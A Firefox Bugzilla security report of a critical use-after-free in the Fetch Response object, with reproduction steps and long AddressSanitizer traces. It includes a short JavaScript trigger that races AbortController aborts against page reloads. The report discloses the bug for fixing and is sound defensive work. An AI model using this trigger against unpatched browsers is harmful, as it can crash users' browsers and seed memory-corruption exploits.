Closed Bug 1565526 Opened 5 years ago Closed 5 years ago

Fetch - Use After Free with Response

Categories

(Core :: DOM: Networking, defect)

Product:
Core
Component:
DOM: Networking
Version:
69 Branch
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED FIXED
Milestone:
mozilla70
Tracking Flags:
Tracking Status
firefox-esr60 --- unaffected
firefox-esr68 --- unaffected
firefox68 --- unaffected
firefox69 --- fixed
firefox70 --- fixed

People

(Reporter: loobenyang, Assigned: baku)

References

Details

(Keywords: csectype-uaf, sec-critical, Whiteboard: [fixed by bug 1567419][post-critsmash-triage])

Attachments

(2 files)

UAF_Response_PoC.js
876 bytes, text/javascript
Details
UAF_Response_EIP_41414141.js
1.42 KB, text/plain
Details
Attached file UAF_Response_PoC.js

Reproduction test case (full server code in attached file UAF_Response_PoC.js):

<script>
var abortCtl = new AbortController();
fetch("./nofile.html", {signal:abortCtl.signal}).then(function(res){res.body;}).catch(function(e){});
setInterval(function(){abortCtl.abort();}, 5);
setTimeout(function(){location.reload();},100);
</script>

Steps to reproduce:

  1. Run server side script UAF_Response_PoC.js with Node.js (node UAF_Response_PoC.js).

  2. Enter http://localhost:12345 in Firefox asan build.

  3. ASAN reports a Use After Free with Response:

    =================================================================
    ==6345==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e00005b820 at pc 0x7fc7760d88c1 bp 0x7fff942f8bf0 sp 0x7fff942f8be8
    READ of size 8 at 0x60e00005b820 thread T0 (Web Content)
    #0 0x7fc7760d88c0 in CanonicalizeXPCOMParticipant /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:848:8

Firefox version: 69.0a1 (2019-07-07) (64-bit)
OS: Ubuntu 18.04 LTS 64bit

Stack trace:

=================================================================
==6345==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e00005b820 at pc 0x7fc7760d88c1 bp 0x7fff942f8bf0 sp 0x7fff942f8be8
READ of size 8 at 0x60e00005b820 thread T0 (Web Content)
    #0 0x7fc7760d88c0 in CanonicalizeXPCOMParticipant /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:848:8
    #1 0x7fc7760d88c0 in CCGraphBuilder::NoteXPCOMChild(nsISupports*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2155
    #2 0x7fc77609ac34 in mozilla::CycleCollectedJSRuntime::TraverseGCThing(mozilla::CycleCollectedJSRuntime::TraverseSelect, JS::GCCellPtr, nsCycleCollectionTraversalCallback&) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:705:5
    #3 0x7fc77609a7a7 in mozilla::JSGCThingParticipant::TraverseNative(void*, nsCycleCollectionTraversalCallback&) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:363:12
    #4 0x7fc7760d628a in TraverseNativeAndJS /builds/worker/workspace/build/src/xpcom/base/nsCycleCollectionParticipant.h:126:19
    #5 0x7fc7760d628a in CCGraphBuilder::BuildGraph(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2061
    #6 0x7fc7760dea84 in nsCycleCollector::MarkRoots(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2672:33
    #7 0x7fc7760e599c in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3417:9
    #8 0x7fc7760e9834 in nsCycleCollector_collectSlice(js::SliceBudget&, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3962:21
    #9 0x7fc779b42be4 in nsJSContext::RunCycleCollectorSlice(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1479:3
    #10 0x7fc779b43a02 in ICCRunnerFired(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1530:3
    #11 0x7fc776260c50 in operator() /builds/worker/workspace/build/src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/6.4.0/../../../../include/c++/6.4.0/functional:2127:14
    #12 0x7fc776260c50 in mozilla::IdleTaskRunner::Run() /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:58
    #13 0x7fc7762619cd in mozilla::TimedOut(nsITimer*, void*) /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:78:13
    #14 0x7fc77628d06b in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:561:7
    #15 0x7fc77628c8e9 in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:260:11
    #16 0x7fc77626dd71 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #17 0x7fc77629fad0 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #18 0x7fc7762a5ee8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #19 0x7fc777372cda in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #20 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #21 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #22 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #23 0x7fc77e897ac9 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #24 0x7fc782524f4f in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #25 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #26 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #27 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #28 0x7fc7825247eb in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #29 0x5581a88a4802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #30 0x5581a88a4802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #31 0x7fc79622eb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #32 0x5581a87c5db8 in _start (/home/thecoder/FirefoxBuilds/firefox/firefox+0x40db8)

0x60e00005b820 is located 0 bytes inside of 160-byte region [0x60e00005b820,0x60e00005b8c0)
freed by thread T0 (Web Content) here:
    #0 0x5581a8871442 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7fc7760ddeb6 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2416:7
    #2 0x7fc7760dcb9e in nsCycleCollector::FreeSnowWhite(bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2609:3
    #3 0x7fc7760e6358 in nsCycleCollector::BeginCollection(ccType, nsICycleCollectorListener*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3584:3
    #4 0x7fc7760e5940 in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3413:9
    #5 0x7fc7760e9834 in nsCycleCollector_collectSlice(js::SliceBudget&, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3962:21
    #6 0x7fc779b42c81 in nsJSContext::RunCycleCollectorSlice(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1479:3
    #7 0x7fc779b479ac in CCRunnerFired(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1869:7
    #8 0x7fc776260c50 in operator() /builds/worker/workspace/build/src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/6.4.0/../../../../include/c++/6.4.0/functional:2127:14
    #9 0x7fc776260c50 in mozilla::IdleTaskRunner::Run() /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:58
    #10 0x7fc77629fad0 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #11 0x7fc7762a5ee8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #12 0x7fc777372cda in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #13 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #14 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #15 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #16 0x7fc77e897ac9 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #17 0x7fc782524f4f in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #18 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #19 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #20 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #21 0x7fc7825247eb in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #22 0x5581a88a4802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #23 0x5581a88a4802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #24 0x7fc79622eb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

previously allocated by thread T0 (Web Content) here:
    #0 0x5581a88717c3 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x5581a88a647d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7fc77c966453 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7fc77c966453 in mozilla::dom::MainThreadFetchResolver::OnResponseAvailableInternal(mozilla::dom::InternalResponse*) /builds/worker/workspace/build/src/dom/fetch/Fetch.cpp:579
    #4 0x7fc77c97a0b5 in OnResponseAvailable /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FetchDriver.h:55:5
    #5 0x7fc77c97a0b5 in mozilla::dom::FetchDriver::BeginAndGetFilteredResponse(mozilla::dom::InternalResponse*, bool) /builds/worker/workspace/build/src/dom/fetch/FetchDriver.cpp:782
    #6 0x7fc77c971431 in mozilla::dom::FetchDriver::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/dom/fetch/FetchDriver.cpp:1048:15
    #7 0x7fc776eda30e in nsCORSListenerProxy::OnStartRequest(nsIRequest*) /builds/worker/workspace/build/src/netwerk/protocol/http/nsCORSListenerProxy.cpp:480:20
    #8 0x7fc776e4c489 in mozilla::net::HttpChannelChild::DoOnStartRequest(nsIRequest*, nsISupports*) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:683:20
    #9 0x7fc776e56bf2 in mozilla::net::HttpChannelChild::OnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:608:3
    #10 0x7fc776ef72c5 in mozilla::net::StartRequestEvent::Run() /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:427:13
    #11 0x7fc776d189a1 in mozilla::net::ChannelEventQueue::RunOrEnqueue(mozilla::net::ChannelEvent*, bool) /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/net/ChannelEventQueue.h:210:10
    #12 0x7fc776e54fda in mozilla::net::HttpChannelChild::RecvOnStartRequest(nsresult const&, mozilla::net::nsHttpResponseHead const&, bool const&, mozilla::net::nsHttpHeaderArray const&, mozilla::net::ParentLoadInfoForwarderArgs const&, bool const&, bool const&, bool const&, unsigned long const&, int const&, unsigned int const&, nsTString<char> const&, nsTString<char> const&, mozilla::net::NetAddr const&, mozilla::net::NetAddr const&, short const&, unsigned int const&, nsTString<char> const&, long const&, bool const&, bool const&, bool const&, mozilla::net::ResourceTimingStruct const&, bool const&) /builds/worker/workspace/build/src/netwerk/protocol/http/HttpChannelChild.cpp:489:12
    #13 0x7fc777740cdb in mozilla::net::PHttpChannelChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PHttpChannelChild.cpp:859:28
    #14 0x7fc777521e99 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&) /builds/worker/workspace/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:7197:32
    #15 0x7fc77736b9c0 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2158:25
    #16 0x7fc777367e1d in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:2082:9
    #17 0x7fc777369a6b in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&) /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1939:3
    #18 0x7fc777369fd7 in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/workspace/build/src/ipc/glue/MessageChannel.cpp:1970:13
    #19 0x7fc77626dd71 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #20 0x7fc77629fad0 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #21 0x7fc7762a5ee8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #22 0x7fc777372cda in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #23 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #24 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #25 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #26 0x7fc77e897ac9 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #27 0x7fc782524f4f in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #28 0x7fc7772a1d22 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #29 0x7fc7772a1d22 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #30 0x7fc7772a1d22 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #31 0x7fc7825247eb in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #32 0x5581a88a4802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #33 0x5581a88a4802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #34 0x7fc79622eb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:848:8 in CanonicalizeXPCOMParticipant
Shadow bytes around the buggy address:
  0x0c1c800036b0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c800036c0: fd fd fd fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c1c800036d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fa
  0x0c1c800036e0: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1c800036f0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
=>0x0c1c80003700: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fd
  0x0c1c80003710: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1c80003720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c80003730: 00 00 00 00 fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c1c80003740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1c80003750: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==6345==ABORTING

baku, dupe of bug 1564821?

Flags: needinfo?(amarchesini)

Correct.

Status: NEW → RESOLVED
Closed: 5 years ago
Flags: needinfo?(amarchesini)
Resolution: --- → DUPLICATE
Flags: sec-bounty?

Unfortunately Nils beat you to this one by a couple of days.

Group: core-security → dom-core-security
Flags: sec-bounty? → sec-bounty-

Actually they are different bugs.
In bug 1564821, the UAF object was allocated in

#3 0x7f5547ee35eb in mozilla::dom::Response::Clone(JSContext*, mozilla::ErrorResult&) /builds/worker/workspace/build/src/dom/fetch/Response.cpp:417
#4 0x7f55456f9456 in mozilla::dom::Response_Binding::clone(JSContext*, JS::Handle<JSObject*>, mozilla::dom::Response*, JSJitMethodCallArgs const&) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/ResponseBinding.cpp:1144:75

While with my PoC, the UAF object was allocated in

#3 0x7fc77c966453 in mozilla::dom::MainThreadFetchResolver::OnResponseAvailableInternal(mozilla::dom::InternalResponse*) /builds/worker/workspace/build/src/dom/fetch/Fetch.cpp:579
#4 0x7fc77c97a0b5 in OnResponseAvailable /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FetchDriver.h:55:5
#5 0x7fc77c97a0b5 in mozilla::dom::FetchDriver::BeginAndGetFilteredResponse(mozilla::dom::InternalResponse*, bool) /builds/worker/workspace/build/src/dom/fetch/FetchDriver.cpp:782

The fix for bug 1564821 was checked in two days ago ( https://bugzilla.mozilla.org/show_bug.cgi?id=1564821#c11 ), but I can still trigger this bug with my very PoC in today's nightly asan build

Firefox version: 70.0a1 (2019-07-17) (64-bit)
OS: Ubuntu 18.04 LTS 64bit

=================================================================
==7796==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000836e0 at pc 0x7fe511e61221 bp 0x7ffdd9a259f0 sp 0x7ffdd9a259e8
READ of size 8 at 0x60e0000836e0 thread T0 (Web Content)
    #0 0x7fe511e61220 in CanonicalizeXPCOMParticipant /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:848:8
    #1 0x7fe511e61220 in CCGraphBuilder::NoteXPCOMChild(nsISupports*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2155
    #2 0x7fe511e235a4 in mozilla::CycleCollectedJSRuntime::TraverseGCThing(mozilla::CycleCollectedJSRuntime::TraverseSelect, JS::GCCellPtr, nsCycleCollectionTraversalCallback&) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:705:5
    #3 0x7fe511e23117 in mozilla::JSGCThingParticipant::TraverseNative(void*, nsCycleCollectionTraversalCallback&) /builds/worker/workspace/build/src/xpcom/base/CycleCollectedJSRuntime.cpp:363:12
    #4 0x7fe511e5ebea in TraverseNativeAndJS /builds/worker/workspace/build/src/xpcom/base/nsCycleCollectionParticipant.h:126:19
    #5 0x7fe511e5ebea in CCGraphBuilder::BuildGraph(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2061
    #6 0x7fe511e673e4 in nsCycleCollector::MarkRoots(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2672:33
    #7 0x7fe511e6e2fc in nsCycleCollector::Collect(ccType, js::SliceBudget&, nsICycleCollectorListener*, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3417:9
    #8 0x7fe511e72194 in nsCycleCollector_collectSlice(js::SliceBudget&, bool) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3962:21
    #9 0x7fe515922cc4 in nsJSContext::RunCycleCollectorSlice(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1479:3
    #10 0x7fe515923ae2 in ICCRunnerFired(mozilla::TimeStamp) /builds/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1530:3
    #11 0x7fe511fe9560 in operator() /builds/worker/workspace/build/src/clang/bin/../lib/gcc/x86_64-unknown-linux-gnu/6.4.0/../../../../include/c++/6.4.0/functional:2127:14
    #12 0x7fe511fe9560 in mozilla::IdleTaskRunner::Run() /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:58
    #13 0x7fe511fea2dd in mozilla::TimedOut(nsITimer*, void*) /builds/worker/workspace/build/src/xpcom/threads/IdleTaskRunner.cpp:78:13
    #14 0x7fe5120159cb in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:561:7
    #15 0x7fe512015249 in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:260:11
    #16 0x7fe511ff66d1 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:295:32
    #17 0x7fe512028430 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #18 0x7fe51202e848 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #19 0x7fe5131105fa in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #20 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #21 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #22 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #23 0x7fe51a686b69 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #24 0x7fe51e331aff in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #25 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #26 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #27 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #28 0x7fe51e33139b in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #29 0x5587bbf51802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #30 0x5587bbf51802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #31 0x7fe5320beb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #32 0x5587bbe72db8 in _start (/home/thecoder/FirefoxBuilds/firefox/firefox+0x40db8)

0x60e0000836e0 is located 0 bytes inside of 160-byte region [0x60e0000836e0,0x60e000083780)
freed by thread T0 (Web Content) here:
    #0 0x5587bbf1e442 in free /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:124:3
    #1 0x7fe511e87e52 in MaybeKillObject /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2429:29
    #2 0x7fe511e87e52 in SnowWhiteKiller::Visit(nsPurpleBuffer&, nsPurpleBufferEntry*) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2459
    #3 0x7fe511e65aa2 in void nsPurpleBuffer::VisitEntries<SnowWhiteKiller>(SnowWhiteKiller&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:941:23
    #4 0x7fe511e66ce9 in nsCycleCollector::FreeSnowWhiteWithBudget(js::SliceBudget&) /builds/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:2624:14
    #5 0x7fe513be22d8 in AsyncFreeSnowWhite::Run() /builds/worker/workspace/build/src/js/xpconnect/src/XPCJSRuntime.cpp:146:9
    #6 0x7fe512041dea in IdleRunnableWrapper::Run() /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:331:22
    #7 0x7fe512028430 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1225:14
    #8 0x7fe51202e848 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:486:10
    #9 0x7fe5131105fa in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:88:21
    #10 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #11 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #12 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #13 0x7fe51a686b69 in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:137:27
    #14 0x7fe51e331aff in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:919:20
    #15 0x7fe513032e62 in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:315:10
    #16 0x7fe513032e62 in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:308
    #17 0x7fe513032e62 in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:290
    #18 0x7fe51e33139b in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:754:34
    #19 0x5587bbf51802 in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:56:28
    #20 0x5587bbf51802 in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:267
    #21 0x7fe5320beb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

previously allocated by thread T0 (Web Content) here:
    #0 0x5587bbf1e7c3 in __interceptor_malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:146:3
    #1 0x5587bbf5347d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:52:15
    #2 0x7fe51874c033 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/cxxalloc.h:33:10
    #3 0x7fe51874c033 in mozilla::dom::MainThreadFetchResolver::OnResponseAvailableInternal(mozilla::dom::InternalResponse*) /builds/worker/workspace/build/src/dom/fetch/Fetch.cpp:579
    #4 0x7fe51875fc13 in OnResponseAvailable /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/FetchDriver.h:55:5
